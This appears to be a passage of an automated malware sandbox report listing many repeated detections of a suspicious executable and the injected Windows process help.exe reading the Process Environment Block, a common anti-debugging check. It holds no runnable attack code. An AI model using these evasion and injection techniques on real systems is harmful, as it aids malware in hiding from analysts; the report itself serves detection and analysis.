          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B57794 mov eax, dword ptr fs:[00000030h]2_2_00B57794
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE8794 mov eax, dword ptr fs:[00000030h]2_2_00AE8794
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B137F5 mov eax, dword ptr fs:[00000030h]2_2_00B137F5
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0E730 mov eax, dword ptr fs:[00000030h]2_2_00B0E730
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD4F2E mov eax, dword ptr fs:[00000030h]2_2_00AD4F2E
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD4F2E mov eax, dword ptr fs:[00000030h]2_2_00AD4F2E
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6FF10 mov eax, dword ptr fs:[00000030h]2_2_00B6FF10
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6FF10 mov eax, dword ptr fs:[00000030h]2_2_00B6FF10
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA070D mov eax, dword ptr fs:[00000030h]2_2_00BA070D
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA070D mov eax, dword ptr fs:[00000030h]2_2_00BA070D
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFF716 mov eax, dword ptr fs:[00000030h]2_2_00AFF716
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0A70E mov eax, dword ptr fs:[00000030h]2_2_00B0A70E
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0A70E mov eax, dword ptr fs:[00000030h]2_2_00B0A70E
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEFF60 mov eax, dword ptr fs:[00000030h]2_2_00AEFF60
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA8F6A mov eax, dword ptr fs:[00000030h]2_2_00BA8F6A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEEF40 mov eax, dword ptr fs:[00000030h]2_2_00AEEF40
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6F0BF mov ecx, dword ptr fs:[00000030h]11_2_00B6F0BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6F0BF mov eax, dword ptr fs:[00000030h]11_2_00B6F0BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6F0BF mov eax, dword ptr fs:[00000030h]11_2_00B6F0BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C08CD6 mov eax, dword ptr fs:[00000030h]11_2_00C08CD6
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B620A0 mov eax, dword ptr fs:[00000030h]11_2_00B620A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B620A0 mov eax, dword ptr fs:[00000030h]11_2_00B620A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B620A0 mov eax, dword ptr fs:[00000030h]11_2_00B620A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B620A0 mov eax, dword ptr fs:[00000030h]11_2_00B620A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B620A0 mov eax, dword ptr fs:[00000030h]11_2_00B620A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B620A0 mov eax, dword ptr fs:[00000030h]11_2_00B620A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B790AF mov eax, dword ptr fs:[00000030h]11_2_00B790AF
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4849B mov eax, dword ptr fs:[00000030h]11_2_00B4849B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B39080 mov eax, dword ptr fs:[00000030h]11_2_00B39080
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB3884 mov eax, dword ptr fs:[00000030h]11_2_00BB3884
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB3884 mov eax, dword ptr fs:[00000030h]11_2_00BB3884
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF14FB mov eax, dword ptr fs:[00000030h]11_2_00BF14FB
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6CF0 mov eax, dword ptr fs:[00000030h]11_2_00BB6CF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6CF0 mov eax, dword ptr fs:[00000030h]11_2_00BB6CF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6CF0 mov eax, dword ptr fs:[00000030h]11_2_00BB6CF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B358EC mov eax, dword ptr fs:[00000030h]11_2_00B358EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]11_2_00BCB8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BCB8D0 mov ecx, dword ptr fs:[00000030h]11_2_00BCB8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]11_2_00BCB8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]11_2_00BCB8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]11_2_00BCB8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]11_2_00BCB8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6BC2C mov eax, dword ptr fs:[00000030h]11_2_00B6BC2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6002D mov eax, dword ptr fs:[00000030h]11_2_00B6002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6002D mov eax, dword ptr fs:[00000030h]11_2_00B6002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6002D mov eax, dword ptr fs:[00000030h]11_2_00B6002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6002D mov eax, dword ptr fs:[00000030h]11_2_00B6002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6002D mov eax, dword ptr fs:[00000030h]11_2_00B6002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4B02A mov eax, dword ptr fs:[00000030h]11_2_00B4B02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4B02A mov eax, dword ptr fs:[00000030h]11_2_00B4B02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4B02A mov eax, dword ptr fs:[00000030h]11_2_00B4B02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4B02A mov eax, dword ptr fs:[00000030h]11_2_00B4B02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB7016 mov eax, dword ptr fs:[00000030h]11_2_00BB7016
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB7016 mov eax, dword ptr fs:[00000030h]11_2_00BB7016
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB7016 mov eax, dword ptr fs:[00000030h]11_2_00BB7016
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6C0A mov eax, dword ptr fs:[00000030h]11_2_00BB6C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6C0A mov eax, dword ptr fs:[00000030h]11_2_00BB6C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6C0A mov eax, dword ptr fs:[00000030h]11_2_00BB6C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6C0A mov eax, dword ptr fs:[00000030h]11_2_00BB6C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C01074 mov eax, dword ptr fs:[00000030h]11_2_00C01074
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]11_2_00BF1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]11_2_00BF1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]11_2_00BF1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]11_2_00BF1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]11_2_00BF1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]11_2_00BF1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]11_2_00BF1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]11_2_00BF1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]11_2_00BF1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]11_2_00BF1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]11_2_00BF1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]11_2_00BF1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]11_2_00BF1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]11_2_00BF1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF2073 mov eax, dword ptr fs:[00000030h]11_2_00BF2073
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C0740D mov eax, dword ptr fs:[00000030h]11_2_00C0740D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C0740D mov eax, dword ptr fs:[00000030h]11_2_00C0740D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C0740D mov eax, dword ptr fs:[00000030h]11_2_00C0740D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C04015 mov eax, dword ptr fs:[00000030h]11_2_00C04015
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C04015 mov eax, dword ptr fs:[00000030h]11_2_00C04015
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5746D mov eax, dword ptr fs:[00000030h]11_2_00B5746D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B50050 mov eax, dword ptr fs:[00000030h]11_2_00B50050
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B50050 mov eax, dword ptr fs:[00000030h]11_2_00B50050
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BCC450 mov eax, dword ptr fs:[00000030h]11_2_00BCC450
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BCC450 mov eax, dword ptr fs:[00000030h]11_2_00BCC450
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6A44B mov eax, dword ptr fs:[00000030h]11_2_00B6A44B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B61DB5 mov eax, dword ptr fs:[00000030h]11_2_00B61DB5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B61DB5 mov eax, dword ptr fs:[00000030h]11_2_00B61DB5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B61DB5 mov eax, dword ptr fs:[00000030h]11_2_00B61DB5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB51BE mov eax, dword ptr fs:[00000030h]11_2_00BB51BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB51BE mov eax, dword ptr fs:[00000030h]11_2_00BB51BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB51BE mov eax, dword ptr fs:[00000030h]11_2_00BB51BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB51BE mov eax, dword ptr fs:[00000030h]11_2_00BB51BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B661A0 mov eax, dword ptr fs:[00000030h]11_2_00B661A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B661A0 mov eax, dword ptr fs:[00000030h]11_2_00B661A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B635A1 mov eax, dword ptr fs:[00000030h]11_2_00B635A1
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB69A6 mov eax, dword ptr fs:[00000030h]11_2_00BB69A6
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B62990 mov eax, dword ptr fs:[00000030h]11_2_00B62990
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6FD9B mov eax, dword ptr fs:[00000030h]11_2_00B6FD9B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6FD9B mov eax, dword ptr fs:[00000030h]11_2_00B6FD9B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6A185 mov eax, dword ptr fs:[00000030h]11_2_00B6A185
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5C182 mov eax, dword ptr fs:[00000030h]11_2_00B5C182
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B62581 mov eax, dword ptr fs:[00000030h]11_2_00B62581
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B62581 mov eax, dword ptr fs:[00000030h]11_2_00B62581
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B62581 mov eax, dword ptr fs:[00000030h]11_2_00B62581
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B62581 mov eax, dword ptr fs:[00000030h]11_2_00B62581
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B32D8A mov eax, dword ptr fs:[00000030h]11_2_00B32D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B32D8A mov eax, dword ptr fs:[00000030h]11_2_00B32D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B32D8A mov eax, dword ptr fs:[00000030h]11_2_00B32D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B32D8A mov eax, dword ptr fs:[00000030h]11_2_00B32D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B32D8A mov eax, dword ptr fs:[00000030h]11_2_00B32D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BE8DF1 mov eax, dword ptr fs:[00000030h]11_2_00BE8DF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]11_2_00B3B1E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]11_2_00B3B1E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]11_2_00B3B1E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BC41E8 mov eax, dword ptr fs:[00000030h]11_2_00BC41E8
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4D5E0 mov eax, dword ptr fs:[00000030h]11_2_00B4D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4D5E0 mov eax, dword ptr fs:[00000030h]11_2_00B4D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]11_2_00BFFDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]11_2_00BFFDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]11_2_00BFFDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]11_2_00BFFDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C005AC mov eax, dword ptr fs:[00000030h]11_2_00C005AC
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C005AC mov eax, dword ptr fs:[00000030h]11_2_00C005AC
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]11_2_00BB6DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]11_2_00BB6DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]11_2_00BB6DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6DC9 mov ecx, dword ptr fs:[00000030h]11_2_00BB6DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]11_2_00BB6DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]11_2_00BB6DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]11_2_00B43D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]11_2_00B43D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]11_2_00B43D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]11_2_00B43D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]11_2_00B43D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]11_2_00B43D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]11_2_00B43D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]11_2_00B43D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]11_2_00B43D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]11_2_00B43D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]11_2_00B43D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]11_2_00B43D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]11_2_00B43D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3AD30 mov eax, dword ptr fs:[00000030h]11_2_00B3AD30
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFE539 mov eax, dword ptr fs:[00000030h]11_2_00BFE539
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6513A mov eax, dword ptr fs:[00000030h]11_2_00B6513A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6513A mov eax, dword ptr fs:[00000030h]11_2_00B6513A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BBA537 mov eax, dword ptr fs:[00000030h]11_2_00BBA537
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B64D3B mov eax, dword ptr fs:[00000030h]11_2_00B64D3B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B64D3B mov eax, dword ptr fs:[00000030h]11_2_00B64D3B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B64D3B mov eax, dword ptr fs:[00000030h]11_2_00B64D3B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B54120 mov eax, dword ptr fs:[00000030h]11_2_00B54120
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B54120 mov eax, dword ptr fs:[00000030h]11_2_00B54120
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B54120 mov eax, dword ptr fs:[00000030h]11_2_00B54120
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B54120 mov eax, dword ptr fs:[00000030h]11_2_00B54120
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B54120 mov ecx, dword ptr fs:[00000030h]11_2_00B54120
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B39100 mov eax, dword ptr fs:[00000030h]11_2_00B39100
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B39100 mov eax, dword ptr fs:[00000030h]11_2_00B39100
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B39100 mov eax, dword ptr fs:[00000030h]11_2_00B39100
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3B171 mov eax, dword ptr fs:[00000030h]11_2_00B3B171
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3B171 mov eax, dword ptr fs:[00000030h]11_2_00B3B171
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5C577 mov eax, dword ptr fs:[00000030h]11_2_00B5C577
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5C577 mov eax, dword ptr fs:[00000030h]11_2_00B5C577
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3C962 mov eax, dword ptr fs:[00000030h]11_2_00B3C962
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B57D50 mov eax, dword ptr fs:[00000030h]11_2_00B57D50
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5B944 mov eax, dword ptr fs:[00000030h]11_2_00B5B944
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5B944 mov eax, dword ptr fs:[00000030h]11_2_00B5B944
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C08D34 mov eax, dword ptr fs:[00000030h]11_2_00C08D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B73D43 mov eax, dword ptr fs:[00000030h]11_2_00B73D43
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB3540 mov eax, dword ptr fs:[00000030h]11_2_00BB3540
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4AAB0 mov eax, dword ptr fs:[00000030h]11_2_00B4AAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4AAB0 mov eax, dword ptr fs:[00000030h]11_2_00B4AAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6FAB0 mov eax, dword ptr fs:[00000030h]11_2_00B6FAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B352A5 mov eax, dword ptr fs:[00000030h]11_2_00B352A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B352A5 mov eax, dword ptr fs:[00000030h]11_2_00B352A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B352A5 mov eax, dword ptr fs:[00000030h]11_2_00B352A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B352A5 mov eax, dword ptr fs:[00000030h]11_2_00B352A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B352A5 mov eax, dword ptr fs:[00000030h]11_2_00B352A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C08ED6 mov eax, dword ptr fs:[00000030h]11_2_00C08ED6
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB46A7 mov eax, dword ptr fs:[00000030h]11_2_00BB46A7
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6D294 mov eax, dword ptr fs:[00000030h]11_2_00B6D294
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6D294 mov eax, dword ptr fs:[00000030h]11_2_00B6D294
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BCFE87 mov eax, dword ptr fs:[00000030h]11_2_00BCFE87
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B62AE4 mov eax, dword ptr fs:[00000030h]11_2_00B62AE4
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B616E0 mov ecx, dword ptr fs:[00000030h]11_2_00B616E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B476E2 mov eax, dword ptr fs:[00000030h]11_2_00B476E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C00EA5 mov eax, dword ptr fs:[00000030h]11_2_00C00EA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C00EA5 mov eax, dword ptr fs:[00000030h]11_2_00C00EA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C00EA5 mov eax, dword ptr fs:[00000030h]11_2_00C00EA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B78EC7 mov eax, dword ptr fs:[00000030h]11_2_00B78EC7
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B636CC mov eax, dword ptr fs:[00000030h]11_2_00B636CC
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B62ACB mov eax, dword ptr fs:[00000030h]11_2_00B62ACB
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BEFEC0 mov eax, dword ptr fs:[00000030h]11_2_00BEFEC0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BEFE3F mov eax, dword ptr fs:[00000030h]11_2_00BEFE3F
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3E620 mov eax, dword ptr fs:[00000030h]11_2_00B3E620
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B74A2C mov eax, dword ptr fs:[00000030h]11_2_00B74A2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B74A2C mov eax, dword ptr fs:[00000030h]11_2_00B74A2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C08A62 mov eax, dword ptr fs:[00000030h]11_2_00C08A62
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B35210 mov eax, dword ptr fs:[00000030h]11_2_00B35210
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B35210 mov ecx, dword ptr fs:[00000030h]11_2_00B35210
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B35210 mov eax, dword ptr fs:[00000030h]11_2_00B35210
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B35210 mov eax, dword ptr fs:[00000030h]11_2_00B35210
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3AA16 mov eax, dword ptr fs:[00000030h]11_2_00B3AA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3AA16 mov eax, dword ptr fs:[00000030h]11_2_00B3AA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B53A1C mov eax, dword ptr fs:[00000030h]11_2_00B53A1C
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6A61C mov eax, dword ptr fs:[00000030h]11_2_00B6A61C
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6A61C mov eax, dword ptr fs:[00000030h]11_2_00B6A61C
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3C600 mov eax, dword ptr fs:[00000030h]11_2_00B3C600
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3C600 mov eax, dword ptr fs:[00000030h]11_2_00B3C600
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3C600 mov eax, dword ptr fs:[00000030h]11_2_00B3C600
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B68E00 mov eax, dword ptr fs:[00000030h]11_2_00B68E00
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1608 mov eax, dword ptr fs:[00000030h]11_2_00BF1608
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B48A0A mov eax, dword ptr fs:[00000030h]11_2_00B48A0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5AE73 mov eax, dword ptr fs:[00000030h]11_2_00B5AE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5AE73 mov eax, dword ptr fs:[00000030h]11_2_00B5AE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5AE73 mov eax, dword ptr fs:[00000030h]11_2_00B5AE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5AE73 mov eax, dword ptr fs:[00000030h]11_2_00B5AE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5AE73 mov eax, dword ptr fs:[00000030h]11_2_00B5AE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B7927A mov eax, dword ptr fs:[00000030h]11_2_00B7927A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4766D mov eax, dword ptr fs:[00000030h]11_2_00B4766D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BEB260 mov eax, dword ptr fs:[00000030h]11_2_00BEB260
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BEB260 mov eax, dword ptr fs:[00000030h]11_2_00BEB260
